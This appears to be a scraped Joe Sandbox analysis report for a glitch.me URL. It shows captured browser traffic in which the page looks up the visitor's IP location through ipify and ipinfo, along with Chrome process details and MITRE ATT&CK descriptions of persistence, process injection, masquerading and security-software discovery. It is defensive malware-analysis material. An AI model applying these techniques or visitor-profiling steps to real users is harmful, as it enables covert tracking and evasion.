2025-01-12 23:25:20 UTC	15731	IN	Data Raw: 00 00 00 1c 66 74 79 70 61 76 69 66 00 00 00 00 61 76 69 66 6d 69 66 31 6d 69 61 66 00 00 01 98 6d 65 74 61 00 00 00 00 00 00 00 21 68 64 6c 72 00 00 00 00 00 00 00 00 70 69 63 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 70 69 74 6d 00 00 00 00 00 01 00 00 00 34 69 6c 6f 63 00 00 00 00 44 40 00 02 00 02 00 00 00 00 01 bc 00 01 00 00 00 00 00 00 00 fa 00 01 00 00 00 00 02 b6 00 01 00 00 00 00 00 00 5e 60 00 00 00 38 69 69 6e 66 00 00 00 00 00 02 00 00 00 15 69 6e 66 65 02 00 00 00 00 01 00 00 61 76 30 31 00 00 00 00 15 69 6e 66 65 02 00 00 00 00 02 00 00 61 76 30 31 00 00 00 00 d7 69 70 72 70 00 00 00 b1 69 70 63 6f 00 00 00 13 63 6f 6c 72 6e 63 6c 78 00 01 00 0d 00 06 80 00 00 00 0c 61 76 31 43 81 04 1c 00 00 00 00 14 69 73 70 65 00 00 00 00 00 Data Ascii: ftypavifavifmif1miafmeta!hdlrpictpitm4ilocD@^`8iinfinfeav01infeav01iprpipcocolrnclxav1Cispe
2025-01-12 23:25:20 UTC	9123	IN	Data Raw: 71 6e b0 e1 ca 5b f9 a5 27 b0 93 b9 3e 03 32 f7 a6 00 29 83 7a 9e 69 ef 2f 76 5f 38 a8 34 f0 d8 77 45 db 9d 4d 89 c5 24 6b da fe f2 fd 0a 09 6d 30 9a 47 a0 7f 66 59 54 30 fd 54 8f 85 97 64 09 b1 17 cd e0 44 82 2e e0 9a 97 31 8b 02 60 0f 0a 7d 69 b3 5a e5 d6 cf f1 ef 1d f8 c1 f5 ea 6f b8 43 b0 7c af 39 43 dd 79 48 f7 d3 de f8 57 ae bf 8a a1 c4 5c c5 b2 dd 83 94 94 15 51 41 18 c0 0b cd 80 c6 25 ca 7a b5 84 a0 1a b9 ca 1d d6 95 5c 15 5b 84 c0 fd ef 6d 9e 3b c8 3b c7 38 60 27 63 f3 e7 bc 54 40 5c a2 55 5e 7e 52 a0 1c 94 86 20 a5 b9 8c b8 98 45 ba 90 0b de 14 c4 0f 02 0a cd 0f ef 2f 2d 6f 06 f0 e7 18 a1 82 3b 1c b4 5d 5b 00 1c 75 58 09 68 17 8a 61 d8 36 dc 25 33 2f 62 9f 9c 25 39 59 b2 4f 28 d7 ea c7 06 81 5a b0 48 b2 95 4c 44 35 c0 26 0c 2e 68 43 e6 22 70 0f Data Ascii: qn['>2)zi/v_84wEM$km0GfYT0TdD.1`}iZoC\|9CyHW\QA%z\[m;;8`'cT@\U^~R E/-o;][uXha6%3/b%9YO(ZHLD5&.hC"p

Timestamp	Bytes transferred	Direction	Data
2025-01-12 23:25:21 UTC	622	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://clumsy-sulky-helium.glitch.me Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://clumsy-sulky-helium.glitch.me/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 23:25:21 UTC	463	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 23:25:21 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 9010e7c03c1a43bd-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1653&rtt_var=622&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1200&delivery_rate=1756919&cwnd=196&unsent_bytes=0&cid=82f789954c08c23f&ts=174&x=0"
2025-01-12 23:25:21 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Timestamp	Bytes transferred	Direction	Data
2025-01-12 23:25:21 UTC	606	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://clumsy-sulky-helium.glitch.me Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://clumsy-sulky-helium.glitch.me/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 23:25:21 UTC	457	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 321 content-type: application/json; charset=utf-8 date: Sun, 12 Jan 2025 23:25:21 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-12 23:25:21 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Timestamp	Bytes transferred	Direction	Data
2025-01-12 23:25:21 UTC	622	OUT	GET /assets/images/vigilado.jpg HTTP/1.1 Host: sapp2406.sirv.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://sapp2406.sirv.com/bogo/lfr_style.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 23:25:21 UTC	446	IN	HTTP/1.1 404 Not Found Date: Sun, 12 Jan 2025 23:25:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 3983 Connection: close Vary: Accept-Encoding X-Account-Id: 6n1mmkhzlshsg2ykfoqy3hmu6m2cqykl X-Account-Serial: 2024-09-08T18:22:41.532Z ETag: W/"f8f-glGkyXBFVEfQV1Zl3qMItA" X-Sirv-Cache: MISS Server: Sirv.Imagination X-Sirv-Server: c1-extra2-fireball-16 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: *
2025-01-12 23:25:21 UTC	3983	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 20 30 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 79 73 74 65 6d 2d 75 69 2c 20 73 61 6e 73 2d Data Ascii: <!DOCTYPE html><html lang="en"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>File not found</title><style>body{margin: 0; font-family: system-ui, sans-

Timestamp	Bytes transferred	Direction	Data
2025-01-12 23:25:21 UTC	333	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 23:25:22 UTC	640	IN	HTTP/1.1 200 OK access-control-allow-origin: * age: 16 cache-control: public,max-age=3600,s-maxage=60,stale-while-revalidate content-type: text/html; charset=utf-8 date: Sun, 12 Jan 2025 23:25:05 GMT etag: "e7f4wpy9od1tuf" referrer-policy: strict-origin-when-cross-origin vary: Accept-Encoding via: 1.1 google, 1.1 google x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-nextjs-cache: HIT x-powered-by: Next.js x-xss-protection: 1; mode=block strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close Transfer-Encoding: chunked
2025-01-12 23:25:22 UTC	750	IN	Data Raw: 33 63 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 2f 3e 3c 74 69 74 6c 65 3e 54 72 75 73 74 65 64 20 49 50 20 44 61 74 61 20 50 72 6f 76 69 64 65 72 2c 20 66 72 6f 6d 20 49 50 76 36 20 74 6f 20 49 50 76 34 20 2d 20 49 50 69 6e 66 6f 2e 69 6f 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 Data Ascii: 3c39<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no, user-scalable=no"/><title>Trusted IP Data Provider, from IPv6 to IPv4 - IPinfo.io</title><meta name="de
2025-01-12 23:25:22 UTC	1390	IN	Data Raw: 66 6f 2e 20 54 72 75 73 74 65 64 20 62 79 20 34 30 30 2c 30 30 30 2b 20 75 73 65 72 73 2c 20 77 65 20 68 61 6e 64 6c 65 20 6d 6f 72 65 20 74 68 61 6e 20 34 30 20 62 69 6c 6c 69 6f 6e 20 41 50 49 20 72 65 71 75 65 73 74 73 20 6d 6f 6e 74 68 6c 79 2e 20 53 69 67 6e 20 75 70 20 66 6f 72 20 66 72 65 65 20 61 63 63 6f 75 6e 74 20 74 6f 64 61 79 2e 22 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 69 70 69 6e 66 6f 2e 69 6f 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 6f 67 5f 6c 6f 67 6f 2e 70 6e 67 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 2f Data Ascii: fo. Trusted by 400,000+ users, we handle more than 40 billion API requests monthly. Sign up for free account today."/><meta property="og:image" content="https://ipinfo.io/static/images/og_logo.png"/><meta name="twitter:card" content="summary_large_image"/
2025-01-12 23:25:22 UTC	1390	IN	Data Raw: 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 69 6e 66 6f 2e 69 6f 2f 73 74 61 74 69 63 2f 64 65 76 69 63 65 69 63 6f 6e 73 2f 61 70 70 6c 65 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 73 69 7a 65 73 3d 22 61 6e 79 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 71 6c 73 33 75 6e 7a 2e 63 73 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 Data Ascii: ch-icon-precomposed" href="https://cdn.ipinfo.io/static/deviceicons/apple-icon-precomposed.png"/><link rel="icon" href="/favicon.ico" sizes="any"/><link rel="stylesheet" media="all" data-href="https://use.typekit.net/qls3unz.css"/><link rel="stylesheet" d
2025-01-12 23:25:22 UTC	1390	IN	Data Raw: 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 69 74 65 2d 63 64 6e 2e 69 70 69 6e 66 6f 2e 69 6f 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 36 36 32 35 2d 66 37 33 33 66 61 34 31 33 62 35 36 38 64 37 32 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 69 74 65 2d 63 64 6e 2e 69 70 69 6e 66 6f 2e 69 6f 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 39 39 33 35 2d 66 65 62 64 64 38 34 35 61 64 38 35 34 64 65 37 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 69 74 65 2d 63 64 6e 2e 69 70 69 6e 66 6f 2e 69 6f 2f 5f 6e Data Ascii: ipt src="https://website-cdn.ipinfo.io/_next/static/chunks/6625-f733fa413b568d72.js" defer=""></script><script src="https://website-cdn.ipinfo.io/_next/static/chunks/9935-febdd845ad854de7.js" defer=""></script><script src="https://website-cdn.ipinfo.io/_n
2025-01-12 23:25:22 UTC	1390	IN	Data Raw: 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 61 6c 73 65 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 72 65 6c 61 74 69 76 65 20 73 74 69 63 6b 79 20 70 79 2d 70 78 20 74 6f 70 2d 30 20 7a 2d 35 30 20 62 67 2d 77 68 69 74 65 20 6c 67 3a 62 67 2d 77 68 69 74 65 2d 30 38 20 73 6d 3a 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 20 73 6d 3a 62 61 63 6b 64 72 6f 70 2d 62 6c 75 72 20 62 6f 72 64 65 72 2d 62 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 31 30 30 22 3e 3c 6e 61 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79 2d 33 20 6d 64 3a 70 79 Data Ascii: ter items-center gap-1 false">Learn more</span></a></div></div></div><header class="relative sticky py-px top-0 z-50 bg-white lg:bg-white-08 sm:backdrop-filter sm:backdrop-blur border-b border-gray-100"><nav class="container py-3 md:py
2025-01-12 23:25:22 UTC	1390	IN	Data Raw: 69 62 6f 6c 64 20 6c 65 61 64 69 6e 67 2d 31 36 20 74 65 78 74 2d 63 68 61 72 63 6f 61 6c 2d 62 6c 75 65 2d 70 72 69 6d 61 72 79 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 64 61 74 61 2d 68 65 61 64 6c 65 73 73 75 69 2d 73 74 61 74 65 3d 22 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 72 2d 31 22 3e 53 6f 6c 75 74 69 6f 6e 73 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 73 70 61 6e 20 68 69 64 64 65 6e 3d 22 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 31 70 78 3b 6c 65 66 74 3a 31 70 78 3b 77 69 64 74 68 3a 31 70 78 3b 68 65 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 Data Ascii: ibold leading-16 text-charcoal-blue-primary" type="button" aria-expanded="false" data-headlessui-state=""><span class="pr-1">Solutions</span><span></span></button></div><span hidden="" style="position:fixed;top:1px;left:1px;width:1px;height:0;padding:0;ma
2025-01-12 23:25:22 UTC	1390	IN	Data Raw: 64 3b 74 6f 70 3a 31 70 78 3b 6c 65 66 74 3a 31 70 78 3b 77 69 64 74 68 3a 31 70 78 3b 68 65 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 63 6c 69 70 3a 72 65 63 74 28 30 2c 20 30 2c 20 30 2c 20 30 29 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 2f 73 70 61 6e 3e 3c 61 20 63 6c 61 73 73 3d 22 62 6f 64 79 2d 70 2d 73 65 6d 69 62 6f 6c 64 20 6c 65 61 64 69 6e 67 2d 31 36 20 70 78 2d 33 20 70 79 2d 32 22 20 68 72 65 66 3d 22 2f 64 65 76 65 6c 6f 70 65 72 73 22 3e 44 6f 63 73 3c 2f 61 3e 3c 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 69 73 69 62 6c 65 20 78 6c Data Ascii: d;top:1px;left:1px;width:1px;height:0;padding:0;margin:-1px;overflow:hidden;clip:rect(0, 0, 0, 0);white-space:nowrap;border-width:0;display:none"></span><a class="body-p-semibold leading-16 px-3 py-2" href="/developers">Docs</a><div><div class="visible xl
2025-01-12 23:25:22 UTC	1390	IN	Data Raw: 61 6e 3e 3c 2f 61 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 6e 73 69 74 69 6f 6e 20 72 6f 75 6e 64 65 64 2d 33 70 78 20 6f 75 74 6c 69 6e 65 2d 6e 6f 6e 65 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 0a 20 20 20 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 20 62 6f 64 79 2d 70 2d 73 65 6d 69 62 6f 6c 64 20 72 65 6c 61 74 69 76 65 20 70 78 2d 35 20 70 79 2d 5b 37 70 78 5d 20 62 67 2d 62 6c 75 65 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 77 68 69 74 65 20 68 6f 76 65 72 3a 62 67 2d 62 6c 75 65 2d 30 36 20 77 2d 66 75 6c 6c 20 78 6c 3a 77 2d 33 32 0a 20 20 20 20 20 20 20 20 66 61 6c 73 65 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 64 61 74 61 2d 6d 61 72 6b 65 74 69 6e 67 2d 65 76 65 6e 74 3d 22 7b 26 Data Ascii: an></a><a class="transition rounded-3px outline-none inline-flex items-center justify-center gap-1 body-p-semibold relative px-5 py-[7px] bg-blue-primary text-white hover:bg-blue-06 w-full xl:w-32 false" target="_self" data-marketing-event="{&
2025-01-12 23:25:22 UTC	1390	IN	Data Raw: 78 20 6f 75 74 6c 69 6e 65 2d 6e 6f 6e 65 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 0a 20 20 20 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 20 62 6f 64 79 2d 70 2d 73 65 6d 69 62 6f 6c 64 20 72 65 6c 61 74 69 76 65 20 70 78 2d 35 20 70 79 2d 5b 39 70 78 5d 20 6c 67 3a 70 79 2d 5b 31 37 70 78 5d 20 62 67 2d 62 6c 75 65 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 77 68 69 74 65 20 68 6f 76 65 72 3a 62 67 2d 62 6c 75 65 2d 30 36 20 6c 67 3a 77 2d 34 38 20 77 2d 66 75 6c 6c 20 73 6d 3a 77 2d 61 75 74 6f 20 74 65 78 74 2d 63 65 6e 74 65 72 0a 20 20 20 20 20 20 20 20 66 61 6c 73 65 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 64 61 74 61 2d 6d 61 72 6b 65 74 69 6e 67 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f Data Ascii: x outline-none inline-flex items-center justify-center gap-1 body-p-semibold relative px-5 py-[9px] lg:py-[17px] bg-blue-primary text-white hover:bg-blue-06 lg:w-48 w-full sm:w-auto text-center false" target="_self" data-marketing-event="{&quo
2025-01-12 23:25:22 UTC	1390	IN	Data Raw: 72 6f 75 6e 64 65 64 2d 35 70 78 20 73 68 61 64 6f 77 2d 32 78 6c 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 2d 31 32 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 67 3a 6d 61 78 2d 32 78 6c 3a 70 72 2d 30 20 6c 67 3a 6d 61 78 2d 32 78 6c 3a 72 6f 75 6e 64 65 64 2d 72 2d 6e 6f 6e 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 67 3a 61 62 73 6f 6c 75 74 65 20 6c 67 3a 77 2d 5b 63 61 6c 63 28 63 61 6c 63 28 31 30 32 34 70 78 2f 32 29 2b 63 61 6c 63 28 63 61 6c 63 28 31 30 30 76 77 2d 31 30 32 34 70 78 29 2f 32 29 29 5d 20 78 6c 3a 77 2d 5b 63 61 6c 63 28 63 61 6c 63 28 31 31 34 30 70 78 2f 32 29 2b 63 61 6c 63 28 63 61 6c 63 28 31 30 30 76 77 2d 31 31 34 30 70 78 29 2f 32 29 29 5d 20 32 78 6c 3a 77 2d 66 75 6c 6c 22 3e 3c 66 Data Ascii: rounded-5px shadow-2xl p-12 lg:max-2xl:pr-0 lg:max-2xl:rounded-r-none lg:absolute lg:w-[calc(calc(1024px/2)+calc(calc(100vw-1024px)/2))] xl:w-[calc(calc(1140px/2)+calc(calc(100vw-1140px)/2))] 2xl:w-full"><f

Target ID:	0
Start time:	18:25:06
Start date:	12/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	18:25:09
Start date:	12/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2320,i,18386388468586391517,7251386231615536648,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	3
Start time:	18:25:15
Start date:	12/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://clumsy-sulky-helium.glitch.me/"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://clumsy-sulky-helium.glitch.me/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

